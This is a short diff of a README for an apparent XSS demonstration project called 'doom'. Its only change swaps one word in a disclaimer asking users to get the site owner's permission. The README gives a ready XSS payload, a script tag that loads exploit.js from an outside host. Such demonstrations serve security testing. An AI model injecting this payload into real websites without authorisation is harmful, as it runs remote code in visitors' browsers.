almroot/doom/README.md

 ### XSS

 If you ever want to demonstrate the possibilities of a XSS vulnerability (as shown in the blog post), you may make an inclusion of [exploit.js](https://almroot.github.io/doom/exploit.js) like so: `<script src='https://almroot.github.io/doom/exploit.js'></script>`.
-Please note that I take no responsibilities for your actions, make sure you have permissions from the website owner(s) before doing anything stupid.
+Please note that I take no responsibilities for your actions, make sure you have permissions from the website owner(s) before doing anything bad.